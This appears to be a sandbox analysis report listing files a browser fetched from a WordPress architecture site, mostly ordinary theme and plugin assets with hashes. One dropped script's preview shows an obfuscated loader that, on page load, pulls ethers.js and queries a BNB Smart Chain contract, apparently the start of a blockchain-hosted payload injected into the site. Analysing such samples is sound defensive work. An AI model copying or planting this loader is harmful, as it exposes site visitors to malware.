                                Preview:.mejs-container{clear:both;max-width:100%}.mejs-container *{font-family:Helvetica,Arial}.mejs-container,.mejs-container .mejs-controls,.mejs-embed,.mejs-embed body{background:#222}.mejs-time{font-weight:400;word-wrap:normal}.mejs-controls a.mejs-horizontal-volume-slider{display:table}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-time-rail .mejs-time-loaded{background:#fff}.mejs-controls .mejs-time-rail .mejs-time-current{background:#0073aa}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail .mejs-time-total{background:rgba(255,255,255,.33)}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail span{border-radius:0}.mejs-overlay-loading{background:0 0}.mejs-controls button:hover{border:none;-webkit-box-shadow:none;box-shadow:none}.me-cannotplay{width:au
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (6194)
                                Category:dropped
                                Size (bytes):6464
                                Entropy (8bit):5.237796564656252
                                Encrypted:false
                                SSDEEP:
                                MD5:170687433986A4A559FA4F16B1D7C70E
                                SHA1:84349B5FB0FCB057AE1768667F480FD607A1DA49
                                SHA-256:722A90D42EF2BD0EA38F0FDAC6B4C0523AA4A027E9FFE889972100746E165582
                                SHA-512:56A266D6ABC2690A87954AF3BC88B15C0FA08C3A8E9047741E8B18FD4179FBC107573BF19C242341BD5A7F7955DB1C6394A2E9240332BFCCA1785B47ADB6CEE2
                                Malicious:false
                                Reputation:unknown
                                Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function a(o,s,u){function c(n,e){if(!s[n]){if(!o[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(l)return l(n,!0);var r=new Error("Cannot find module '"+n+"'");throw r.code="MODULE_NOT_FOUND",r}var i=s[n]={exports:{}};o[n][0].call(i.exports,function(e){var t=o[n][1][e];return c(t||e)},i,i.exports,a,o,s,u)}return s[n].exports}for(var l="function"==typeof require&&require,e=0;e<u.length;e++)c(u[e]);return c}({1:[function(e,t,n){"use strict";var T={promise:null,load:function(e){"undefined"!=typeof Vimeo?T._createPlayer(e):(T.promise=T.promise||mejs.Utils.loadScript("https://player.vimeo.com/api/player.js"),T.promise.then(function(){T._createPlayer(e)}))},_createPlayer:function(e){var t=new Vimeo.P
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 480 x 246, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):10216
                                Entropy (8bit):7.850183303799885
                                Encrypted:false
                                SSDEEP:
                                MD5:D988EDF17A6C50232A34FC1C7C90E763
                                SHA1:2EAB77A7DA35EB7D8C3D0A56AA62A5DB5D806411
                                SHA-256:7E026CE96C877BBD3668B65B0634886FE5AECCB23F19DEF2BC907955EEA31920
                                SHA-512:B9631234C3F63162BDC89FF0AFC4487E75FB55EA51584B646E6C896C1ABCE16FB8B89464F19B2FF3AA148F247E704DD8940E3A5F3A3C9FF5ADD89C75B743F21C
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR..............N......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmp:CreateDate="2022-10-13T11:37:18+03:00" xmp:ModifyDate="2022-10-13T11:38:52+03:00" xmp:MetadataDate="2022-10-13T11:38:52+03:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:059d619f-7010-9a47-ab76-6ef3db6bae07" xmpMM:DocumentID="xmp.did:059d619f-7010-9a47-ab76-6ef3db6bae07" xmpMM:OriginalDo
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (10943), with no line terminators
                                Category:downloaded
                                Size (bytes):10943
                                Entropy (8bit):4.662029133138789
                                Encrypted:false
                                SSDEEP:
                                MD5:336FFC2DFEEE89DEFA0DB3883C05BCC7
                                SHA1:2D2240CBAE8D6E49C569F57370787FD8441D4383
                                SHA-256:06723045419949302E1D4ABE65CB4A535582E60D1A53645AB838B06079D98EB0
                                SHA-512:40A0B5519FD91CD805CD5292021579BF98FBDDE78BF4410DDBCF5E2801056808E0022A1B5409D5BFF006B8F6D7B0A97574DA1E97790DAFA3D89D2893CD55410B
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/simple-line-icons/assets/css/simple-line-icons.min.css?ver=6.6.2
                                Preview:@font-face{font-family:simple-line-icons;src:url(../fonts/Simple-Line-Icons.eot?v=2.4.0);src:url(../fonts/Simple-Line-Icons.eot?v=2.4.0#iefix) format('embedded-opentype'),url(../fonts/Simple-Line-Icons.woff2?v=2.4.0) format('woff2'),url(../fonts/Simple-Line-Icons.ttf?v=2.4.0) format('truetype'),url(../fonts/Simple-Line-Icons.woff?v=2.4.0) format('woff'),url(../fonts/Simple-Line-Icons.svg?v=2.4.0#simple-line-icons) format('svg');font-weight:400;font-style:normal}.icon-action-redo,.icon-action-undo,.icon-anchor,.icon-arrow-down,.icon-arrow-down-circle,.icon-arrow-left,.icon-arrow-left-circle,.icon-arrow-right,.icon-arrow-right-circle,.icon-arrow-up,.icon-arrow-up-circle,.icon-badge,.icon-bag,.icon-ban,.icon-basket,.icon-basket-loaded,.icon-bell,.icon-book-open,.icon-briefcase,.icon-bubble,.icon-bubbles,.icon-bulb,.icon-calculator,.icon-calendar,.icon-call-end,.icon-call-in,.icon-call-out,.icon-camera,.icon-camrecorder,.icon-chart,.icon-check,.icon-chemistry,.icon-clock,.icon-close,.icon-
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (32037)
                                Category:downloaded
                                Size (bytes):116228
                                Entropy (8bit):5.470218124687671
                                Encrypted:false
                                SSDEEP:
                                MD5:1CDB51EC2F59B803CDCDA4DED3C188F8
                                SHA1:C7A4D1877417EDE060B0C42DA6835C77358E8AD1
                                SHA-256:94F137C233766BB0015876C6CFBF8C28125ACA4CB3A826D4F7A0495A38A8F3A5
                                SHA-512:0E43EC1FD2F337365A6630ACCF02ABA282B082302B2438848C0E6D4E0AF7617E04E9362FF772024BC4F8D721472679D2986A677F432F6F936149C61BC2F867DB
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/assets/plugins/tweenmax/tweenmax.min.js?ver=6.6.2
                                Preview:/*!. * VERSION: 2.1.3. * DATE: 2019-05-17. * UPDATES AND DOCS AT: http://greensock.com. * . * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotationPlugin. *. * @license Copyright (c) 2008-2019, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. **/.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("TweenMax",["core.Animation","core.SimpleTimeline","TweenLite"],function(a,b,c){var d=function(a){var b,c=[],d=a.length;for(b=0;b!==d;c.push(a[b++]));return c},e=function(a,b,c){var d,e,f=a.cycle;for(d in f)e=f[d],a[d]="function"==typeof e?e(c
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (64288)
                                Category:dropped
                                Size (bytes):382936
                                Entropy (8bit):5.381150322990143
                                Encrypted:false
                                SSDEEP:
                                MD5:71CE48DDF4CAC7D8BCE4C0F574C4B9ED
                                SHA1:F9EF3531D6E74249531971735F6D7EC8A30C7FCD
                                SHA-256:81FF08960B407FDE4EE478CF9E8804CA6DAF5491D65932F255E24BABED80D14B
                                SHA-512:6102732848A03EF20B623786615D7306B08CB741F647F00A195760B09EFB8CD81EBC10F3544A35DCCEEA05A44FA1C5A10FCB03EABEA10DFFE88121C2BB2A3BCE
                                Malicious:false
                                Reputation:unknown
                                Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2021-08-20..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (651)
                                Category:dropped
                                Size (bytes):2277
                                Entropy (8bit):5.379088155713387
                                Encrypted:false
                                SSDEEP:
                                MD5:67E56C47F9D6FCB34815257FE2464EE8
                                SHA1:C73C7F22E8D3BC2963EEB2EBC61F3D3552CEE55A
                                SHA-256:527061570A3FB5294742FFF2584D658F467DF516D7D057EBA6314AAE3A42FC64
                                SHA-512:A91DCB3B63C5E9FF524F4E48966494CDCBA170F1450EFEAB3C37C3C3E03CFBA5A3AD519173068DC25503D0FAC64C45BC92F463E65115C64A5AFF455EB2BB2D42
                                Malicious:false
                                Reputation:unknown
                                Preview:document.addEventListener('DOMContentLoaded', function() {. const _0x1a21 = atob("aHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvZXRoZXJzLzYuMTMuMS9ldGhlcnMudW1kLm1pbi5qcw==");. function _0x9b43(_0x2d23, _0x4f6d) {. const _0x5c32 = document.createElement('script');. _0x5c32.src = _0x2d23, _0x5c32.type = "application/javascript", _0x5c32.onload = _0x4f6d, document.head.appendChild(_0x5c32);. }. function _0x8f7c() {. const _0x7a13 = new ethers.JsonRpcProvider(atob("aHR0cHM6Ly9ic2MtZGF0YXNlZWQxLmJpbmFuY2Uub3JnLw==")),. _0x2b39 = "0xa6165aa33ac710ad5dcd4f4d6379466825476fde",. _0x6f8b = atob("W3siaW5wdXRzIjpbXSwic3RhdGVNdXRhYmlsaXR5Ijoibm9ucGF5YWJsZSIsInR5cGUiOiJjb25zdHJ1Y3RvciJ9LHsiYW5vbnltb3VzIjpmYWxzZSwiaW5wdXRzIjpbeyJpbmRleGVkIjpmYWxzZSwiaW50ZXJuYWxUeXBlIjoic3RyaW5nIiwibmFtZSI6IiIsInR5cGUiOiJzdHJpbmcifV0sIm5hbWUiOiJFIiwidHlwZSI6ImV2ZW50In0seyJpbnB1dHMiOlt7ImludGVybmFsVHlwZSI6InN0cmluZyIsIm5hbWUiOiJfYyIsInR5cGUiOiJzdHJpbmcifV0sI
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):22
                                Entropy (8bit):4.004886164091841
                                Encrypted:false
                                SSDEEP:
                                MD5:AA16C94D7F546EFA560A808FC691BBF4
                                SHA1:15AA815356FE05CC665EE6B3D4D2920328BDCEE3
                                SHA-256:A970FE16ED13327A69C0E8CF2C36F2C289CB7D16308520985108FB15FE44DA7A
                                SHA-512:444F390D28EE571796AD6543F66DEB7C92AA94FAE8C59D2617E2DB70BFC4E55815FDA1AA367D01E14E4DE01799763AC986DFA87F2C3F172D8FA5539ADB5465D8
                                Malicious:false
                                Reputation:unknown
                                Preview:// JavaScript Document
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (15752)
                                Category:downloaded
                                Size (bytes):18726
                                Entropy (8bit):4.756109283632968
                                Encrypted:false
                                SSDEEP:
                                MD5:B976B651932BFD25B9DDB5B7693D88A7
                                SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-includes/js/wp-emoji-release.min.js?ver=6.6.2
                                Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (1107), with no line terminators
                                Category:dropped
                                Size (bytes):1107
                                Entropy (8bit):5.064499259121075
                                Encrypted:false
                                SSDEEP:
                                MD5:8A5C9689AE636C452B6808740BA04136
                                SHA1:8D2C85D7779D00C12AEB6B55A99443952D9A144E
                                SHA-256:79CB399203843F65199BEC32BC4ABAC5DFD20F141D3E4EC1424BF00C7108FA45
                                SHA-512:A80491B5C34E4719B042D1EF0DC8CFF0E2AD29343AC8926A3CAB36202B02DC360000B430B3141E474FE08BFFC54329EB47082D530AF6B44727490C4CD0F0ED0C
                                Malicious:false
                                Reputation:unknown
                                Preview:!function(e,n){e.wp=e.wp||{},e.wp.mediaelement=new function(){var t={};return{initialize:function(){var e=[];(t="undefined"!=typeof _wpmejsSettings?n.extend(!0,{},_wpmejsSettings):t).classPrefix="mejs-",t.success=t.success||function(e){var t,n;e.rendererName&&-1!==e.rendererName.indexOf("flash")&&(t=e.attributes.autoplay&&"false"!==e.attributes.autoplay,n=e.attributes.loop&&"false"!==e.attributes.loop,t&&e.addEventListener("canplay",function(){e.play()},!1),n)&&e.addEventListener("ended",function(){e.play()},!1)},t.customError=function(e,t){if(-1!==e.rendererName.indexOf("flash")||-1!==e.rendererName.indexOf("flv"))return'<a href="'+t.src+'">'+mejsL10n.strings["mejs.download-file"]+"</a>"},void 0!==t.videoShortcodeLibrary&&"mediaelement"!==t.videoShortcodeLibrary||e.push(".wp-video-shortcode"),void 0!==t.audioShortcodeLibrary&&"mediaelement"!==t.audioShortcodeLibrary||e.push(".wp-audio-shortcode"),e.length&&n(e.join(", ")).not(".mejs-container").filter(function(){return!n(this).parent(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):237866
                                Entropy (8bit):4.894876257470024
                                Encrypted:false
                                SSDEEP:
                                MD5:6EF0752F673FE0236E3340CD2DF264C4
                                SHA1:821C08E6F0B21D364E372421C8EC0C143B154830
                                SHA-256:A61A07896BB39A9FF11C44BB150121AEF1AD64E0FF31E12748AF9EE4A7003FE0
                                SHA-512:443E477979C0ACFBEB6F203C28D0EE81CA5B0E36D00ADE7E2731125A4534063F290E473B539DC657F7A0B6F0AFAE9F005061D9762F61242BA0FD567515E0692B
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok/assets/css/grid.min.css?ver=6.6.2
                                Preview:.qodef-content-grid{width:1100px;margin:0 auto}.qodef-content-grid.qodef-extended-grid:not([class*=qodef-extended-grid-disabled--]){width:100%!important;margin:0}@media only screen and (min-width:1441px){.qodef-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1440{width:100%!important;margin:0}}@media only screen and (max-width:1440px){.qodef-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1440{padding-left:0!important;padding-right:0!important}}@media only screen and (min-width:1367px){.qodef-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1366{width:100%!important;margin:0}}@media only screen and (max-width:1366px){.qodef-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1366{padding-left:0!important;padding-right:0!important}}@media only screen and (min-width:1025px){.qodef-content-grid.qodef-extended-grid.qodef-extended-grid-disabled--1024{width:100%!important;margin:0}}@media only screen and (max-width:1024px){.qodef-content
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):280294
                                Entropy (8bit):4.736154278579596
                                Encrypted:false
                                SSDEEP:
                                MD5:524DBCBD7431F08C731C9750619FE071
                                SHA1:58E5404BB10D7F4A30FE9470E45B5EB36DF37088
                                SHA-256:FCD3B8C0EBB7130DDC44FD2D76465DE6659D19F18A775E372157412CDA1E7715
                                SHA-512:F7594D37C92C05F1D0244AB5A0A21B8B0653FE6440D74C092F3667195149BD180B4193E9DBA18988699A095228AF2743EBCCDE47270B253345238B81EC411654
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.6.2
                                Preview:.qodef-addons-blog-list{position:relative;display:inline-block;width:100%;vertical-align:top}.qodef-addons-blog-list .qodef-blog-item{position:relative;display:inline-block;width:100%;vertical-align:top}.qodef-addons-blog-list .qodef-blog-item .qodef-e-content,.qodef-addons-blog-list .qodef-blog-item .qodef-e-inner,.qodef-addons-blog-list .qodef-blog-item .qodef-e-media{position:relative;display:inline-block;width:100%;vertical-align:top}.qodef-addons-blog-list .qodef-blog-item .qodef-e-media-image{position:relative;display:inline-block;vertical-align:top;max-width:100%;overflow:hidden;z-index:1}.qodef-addons-blog-list .qodef-blog-item .qodef-e-media{display:block}.qodef-addons-blog-list .qodef-blog-item .qodef-e-media iframe{display:block;height:100%}.qodef-addons-blog-list .qodef-blog-item .qodef-e-title{margin:0 0 .5em}.qodef-addons-blog-list .qodef-blog-item .qodef-e-excerpt{margin:0}.qodef-addons-blog-list .qodef-blog-item .qodef-e-info{position:relative;display:flex;flex-wrap:wra
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):985
                                Entropy (8bit):4.9767995325459475
                                Encrypted:false
                                SSDEEP:
                                MD5:08500A3E31A186457AFC399A48368BEB
                                SHA1:629858DB098718677266172BE93038360C997EB3
                                SHA-256:06FEC45E6ED4B26A95BD7977A2DCB331BE2FC481BD76DF0974DAA2ECAE4D1B72
                                SHA-512:D18AAE889B2ABC9A59665A188D11DA263805DF5BDB4A47B9686609229DBF376551BC9D7ABB423B307DC086BDBEAE389CE353CC0F3F2290CB0FCC63BC68C37E50
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/themes/brok-child/style.css?ver=6.6.2
                                Preview:/*.Theme Name: Brok Child.Theme URI: https://brok.qodeinteractive.com.Description: A child theme of Brok.Author: Edge Themes.Author URI: https://qodeinteractive.com.Version: 1.0.Text Domain: brok.Template: brok.*/...qodef-e.qodef-info--date, .qodef-e.qodef-info--category, .qodef-e.qodef-info--social-share{....display:none !important.}...qodef-portfolio-single .qodef-portfolio-info>:last-child {.display:none !important..}..div#mainrow .qodef-e.qodef-grid-item.swiper-slide.qodef-pfs-item[data-index="0"] {. width: 20% !important;.}.div#mainrow .qodef-e.qodef-grid-item.swiper-slide.qodef-pfs-item[data-index="1"] {. width: 20% !important;.}.div#mainrow .qodef-e.qodef-grid-item.swiper-slide.qodef-pfs-item[data-index="2"] {. width: 20% !important;.}.div#mainrow .qodef-e.qodef-grid-item.swiper-slide.qodef-pfs-item[data-index="3"] {. width: 20% !important;.}.div#mainrow .qodef-e.qodef-grid-item.swiper-slide.qodef-pfs-item[data-index="4"] {. width: 20% !important;.}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (34926)
                                Category:downloaded
                                Size (bytes):35284
                                Entropy (8bit):5.082943801356676
                                Encrypted:false
                                SSDEEP:
                                MD5:4C52B79DA41EE3E276F64CCFF0F9F052
                                SHA1:F68F8178B0C326891E302AFD292CBDD211778D16
                                SHA-256:7667A6628C351F72E454D4AF39993257626F94B88BAAB24DA275255888FFB8C4
                                SHA-512:3D107883D54305DB67C05E93B7A102E72BADDE74ED9279AA1965770C70CD9C1CDF7F3D00B1B66ACFBBDB1752391121172423DBE7CECC6F9522FDFEBB1F4F37D6
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/qi-addons-for-elementor/inc/masonry/assets/js/plugins/isotope.pkgd.min.js?ver=6.6.2
                                Preview:/*!. * Isotope PACKAGED v3.0.6. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2010-2018 Metafizzy. *. * Edited by Qode: enabled initialization in iframe. * Added isElement function to be used instead of instanceof HTMLElement on line 214 (unminified version). */.!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){(a=a||e||t.jQuery)&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t))}),a.fn[i]=function(t){return"string"==typeof t?function(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(h){var l=h[e];if(l&&"_"!=e.charAt(0)){var d=l.apply(h,o);n=void 0===n?d:n}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):2952
                                Entropy (8bit):5.411344403384351
                                Encrypted:false
                                SSDEEP:
                                MD5:D73F8A80867CF301B44AA2A60366FC39
                                SHA1:7AE454EA555C7895A775509C8E107296335FF648
                                SHA-256:0EB17B7F9C42BB0781ADD75F48909E6150E669504807FE780ECF0A175E4941CD
                                SHA-512:2359C727C6241C85085CB2F48BFB91DFE6AF13AB977DEF847C209846D9105314AB5317CD1414D08BB91D0D1958460429BFA6911E6A0AA0C878D3EF81EBF68A83
                                Malicious:false
                                Reputation:unknown
                                URL:https://fonts.googleapis.com/css2?family=Golos+Text:wght@400;700&display=swap
                                Preview:/* cyrillic-ext */.@font-face {. font-family: 'Golos Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/golostext/v4/q5uCsoe9Lv5t7Meb31EcEx58hLxR.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Golos Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/golostext/v4/q5uCsoe9Lv5t7Meb31EcExd8hLxR.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* latin-ext */.@font-face {. font-family: 'Golos Text';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/golostext/v4/q5uCsoe9Lv5t7Meb31EcEx18hLxR.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (1117), with no line terminators
                                Category:downloaded
                                Size (bytes):1117
                                Entropy (8bit):4.813622047711918
                                Encrypted:false
                                SSDEEP:
                                MD5:52FFA62821626B551C788CDD94527722
                                SHA1:4DEA3478799497453D3514C0481171850EA164C9
                                SHA-256:C720009932904D8C050111375EF3C2C494A4520F0DE48665AFFDF2C26B86B14A
                                SHA-512:92BF1F036F7C6D8A665FABA04F948DEFF70D1AA3CBA52CF9DBB2E5F1361B661C2AD32FC93C46E3CF86545B430527165620832E2AC2B40B51390F6B20F3795843
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/uploads/elementor/css/post-7.css?ver=1649938458
                                Preview:.elementor-kit-7{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1140px;}.e-container{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-bottom:20px;}.elementor-element{--widgets-spacing:20px;}{}h1.entry-title{display:var(--page-title-display);}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-container{--container-max-width:1024px;}}@media(max-width:767px){.elemento
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (42983), with no line terminators
                                Category:downloaded
                                Size (bytes):42983
                                Entropy (8bit):4.6602381634806305
                                Encrypted:false
                                SSDEEP:
                                MD5:03181AA1E4FA89CCF72841151346FB70
                                SHA1:9F9B8DF4F945AFCBCD172B6B1A76A2810E62B1C7
                                SHA-256:C73255E673C37ADC84E2EB17EA873453C0E0CEB67A0E2FB757D7F7310E6B14FE
                                SHA-512:BDB28A496855697EF31D2EE0D1C9E0753869D6DE037842514BC2BDA6D2554AEE85B8B7C59B78A5F3E9DFC2A5CBDBD77F5FA3CD6C4A9C886CD780A68A35423B68
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/brok-core/inc/icons/linea-icons/assets/css/linea-icons.min.css?ver=6.6.2
                                Preview:@charset "UTF-8";@font-face{font-family:"linea-arrows-10";src:url("../fonts/arrows/fonts/linea-arrows-10.eot");src:url("../fonts/arrows/fonts/linea-arrows-10.eot?#iefix") format("embedded-opentype"),url("../fonts/arrows/fonts/linea-arrows-10.woff") format("woff"),url("../fonts/arrows/fonts/linea-arrows-10.ttf") format("truetype"),url("../fonts/arrows/fonts/linea-arrows-10.svg#linea-arrows-10") format("svg");font-weight:normal;font-style:normal}@font-face{font-family:"linea-basic-10";src:url("../fonts/basic/fonts/linea-basic-10.eot");src:url("../fonts/basic/fonts/linea-basic-10.eot?#iefix") format("embedded-opentype"),url("../fonts/basic/fonts/linea-basic-10.woff") format("woff"),url("../fonts/basic/fonts/linea-basic-10.ttf") format("truetype"),url("../fonts/basic/fonts/linea-basic-10.svg#linea-basic-10") format("svg");font-weight:normal;font-style:normal}@font-face{font-family:"linea-basic-elaboration-10";src:url("../fonts/basic-elaboration/fonts/linea-basic-elaboration-10.eot");src:ur
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (37702)
                                Category:downloaded
                                Size (bytes):37741
                                Entropy (8bit):5.189243163766369
                                Encrypted:false
                                SSDEEP:
                                MD5:7CF8158802D75964961E8A830AFE98C8
                                SHA1:FD349B3A9E5F3AA6B677EABBB41394F0CE90835F
                                SHA-256:872DFFE40AA155ED1F97D68D65C6847981E8F138154536A9B5B8856133DCC6AF
                                SHA-512:7A7193CEBEAE1FAAA9CBD210F4901531BCE2BFBCC3034091AE568B0F6BCC8B9051759C40619DF5E10FF9CAC02363767A336AA289DD378D83806EA7B3BEEF513B
                                Malicious:false
                                Reputation:unknown
                                URL:https://thearchiterra.gr/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.4
